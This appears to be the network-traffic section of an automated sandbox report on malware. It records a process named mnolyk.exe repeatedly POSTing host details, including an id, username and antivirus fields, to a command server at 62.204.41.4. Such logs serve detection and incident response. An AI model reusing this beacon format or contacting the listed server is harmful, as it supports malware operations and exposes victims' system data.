                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.361520052 CET685INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            497192.168.2.45019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:45.528131962 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.590791941 CET686INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            498192.168.2.45019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:45.766475916 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.831042051 CET687INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            499192.168.2.45019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:45.998769045 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.060642004 CET688INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.44970062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:25.618449926 CET194OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.682064056 CET194INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            50192.168.2.44974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:39.033149958 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.097521067 CET239INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            500192.168.2.45019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:46.232146025 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.296885014 CET689INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            501192.168.2.45019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:46.473902941 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.538629055 CET690INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            502192.168.2.45019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:46.717262983 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.781402111 CET691INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            503192.168.2.45019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:46.952790022 CET691OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.017493963 CET692INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            504192.168.2.45019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:47.192794085 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.256427050 CET693INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            505192.168.2.45020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:47.437016010 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.501085997 CET694INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            506192.168.2.45020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:47.669673920 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.734966993 CET695INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            507192.168.2.45020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:47.905015945 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.970180035 CET696INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            508192.168.2.45020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:48.140899897 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.205348015 CET697INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            509192.168.2.45020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:48.373919010 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.437956095 CET698INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            51192.168.2.44974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:39.277463913 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.341696024 CET240INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            510192.168.2.45020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:48.611499071 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.676002026 CET699INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            511192.168.2.45020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:48.861881971 CET699OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:48.925546885 CET700INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            512192.168.2.45020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:49.091510057 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.157483101 CET701INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            513192.168.2.45020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:49.326376915 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:49.392637014 CET702INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            514192.168.2.45020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:49.582808971 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
